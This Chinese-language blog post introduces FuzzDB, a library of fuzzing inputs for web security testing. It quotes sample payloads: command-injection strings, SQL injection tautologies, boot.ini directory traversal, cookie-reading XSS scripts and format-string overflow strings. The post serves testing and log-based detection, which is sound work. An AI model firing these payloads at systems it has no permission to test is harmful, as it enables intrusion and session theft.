網站安全測試的測試個案資料庫 – FuzzDB

Web Security / 雲端資訊安全

資訊安全測試的測試個案資料庫 – FuzzDB

這篇文章主要介紹 FuzzDB,FuzzDB主要提供網站資訊安全測試時,

或是自動化安全測試工具所需要的測試個案資料,舉例來說, Injection的攻擊,

但是實際測試的時候,到底要輸入什麼值來當作是 Injection Attack 的測試資料呢?

FuzzDB 提供各種攻擊行為會用到的測試個案資料

https://code.google.com/p/fuzzdb/source/browse/#svn%2Ftrunk

fuzzDB

 

舉例來說 “All-attacks-win.txt” 這個檔案提供許多安全測試個案所需的資料

https://code.google.com/p/fuzzdb/source/browse/trunk/attack-payloads/all-attacks/all-attacks-win.txt

Command injection

| ping -i 30 127.0.0.1 |
| ping -n 30 127.0.0.1 |
& ping -i 30 127.0.0.1 &
& ping -n 30 127.0.0.1 &
; ping 127.0.0.1 ;
%0a ping -i 30 127.0.0.1 %0a
`ping 127.0.0.1`
;echo 111111
echo 111111
response.write 111111

 

SQL Injection

‘) or (‘x’=’x
0 or 1=1
‘ or 0=0 —
” or 0=0 —
or 0=0 —
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or 1=1–
” or 1=1–

Directory Traversal

/./././././././././././boot.ini
/../../../../../../../../../../../boot.ini%00
/../../../../../../../../../../../boot.ini
/..\../..\../..\../..\../..\../..\../boot.ini

 JavaScript / XSS injection 

“><script>”
<script>alert(“XSS”)</script>
<<script>alert(“XSS”);//<</script>
<script>alert(document.cookie)</script>
‘><script>alert(document.cookie)</script>
‘><script>alert(document.cookie);</script>
\”;alert(‘XSS’);//
%3cscript%3ealert(“XSS”);%3c/script%3e
%3cscript%3ealert(document.cookie);%3c%2fscript%3e
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E
&ltscript&gtalert(document.cookie);</script>

Buffer Overflow

%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d
%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i
%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o
%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u

 

進行資訊安全測試時,就可以使用自動化測試工具,或是半自動化測試工具

挑選合適的測試個案資訊輸入進行測試

測試流程 + 測試工具 + 測試個案資料 FuzzDB

這三者的結合會讓整個資訊安全測試更加完善

另一方面,如果再 Web Log中看到這些輸入值,也代表有潛在的資訊安全威脅,

可以進一步設定防火牆,或是將網站的安全設計再強化。

 

Related Posts

“Hands-On Security in DevOps” Book Released

August 13, 2018

網絡安全技術文章彙整 

August 9, 2018

MySQL 效能監控SQL語句

August 5, 2018

Firmware 必備測試工具

May 12, 2018

軟體安全開源開發框架介紹

March 15, 2018

威脅分析的開源工具分享

March 12, 2018

Leave a Reply

Your email address will not be published. Required fields are marked *